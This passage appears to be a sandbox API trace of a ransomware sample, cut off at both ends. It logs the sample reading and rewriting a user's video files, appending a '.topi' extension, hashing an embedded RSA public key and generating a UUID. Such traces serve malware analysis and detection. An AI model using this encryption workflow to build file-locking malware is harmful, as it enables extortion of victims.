hHeap=0x680000) returned 1 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e50a8 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5090 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x3191bd8 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50a8 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5090 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.960] GetCurrentThreadId () returned 0x8c4 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa7c0 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.960] GetCurrentThreadId () returned 0x8c4 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5090 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50a8 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5078 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e50c0 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5090 | out: hHeap=0x680000) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5090 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5090 | out: hHeap=0x680000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50c0 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50a8 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5078 | out: hHeap=0x680000) returned 1 [0097.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5060 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbc38 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.963] WriteFile (in: hFile=0x6a8, lpBuffer=0x99fc2d8*, nNumberOfBytesToWrite=0x609f, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99fc2d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x609f, lpOverlapped=0x0) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc2d8 | out: hHeap=0x680000) returned 1 [0097.963] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x60a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.963] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.963] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.963] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.963] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.964] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.964] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.964] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.964] CloseHandle (hObject=0x6a8) returned 1 [0097.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0097.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8d0) returned 0x31cf750 [0097.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.965] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\G7Fo.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\g7fo.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\G7Fo.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\g7fo.avi.topi")) returned 1 [0097.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.965] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.967] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5df2bc10, ftCreationTime.dwHighDateTime=0x1d5c47e, ftLastAccessTime.dwLowDateTime=0x113fe630, ftLastAccessTime.dwHighDateTime=0x1d5c4b6, ftLastWriteTime.dwLowDateTime=0x113fe630, ftLastWriteTime.dwHighDateTime=0x1d5c4b6, nFileSizeHigh=0x0, nFileSizeLow=0x8f26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L0wpCqB_55lG bK7N.flv", cAlternateFileName="L0WPCQ~1.FLV")) returned 1 [0097.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x106) returned 0x31919a8 [0097.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.967] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\L0wpCqB_55lG bK7N.flv") returned=".flv" [0097.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\L0wpCqB_55lG bK7N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\l0wpcqb_55lg bk7n.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.967] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=36646) returned 1 [0097.967] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.970] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8f00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.970] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.973] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.973] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x8f26, lpOverlapped=0x0) returned 1 [0097.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.973] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.974] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.974] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.974] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.974] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.975] GetLastError () returned 0x0 [0097.975] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.975] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.975] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.975] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.975] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8f30) returned 0x9a06a00 [0097.975] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) 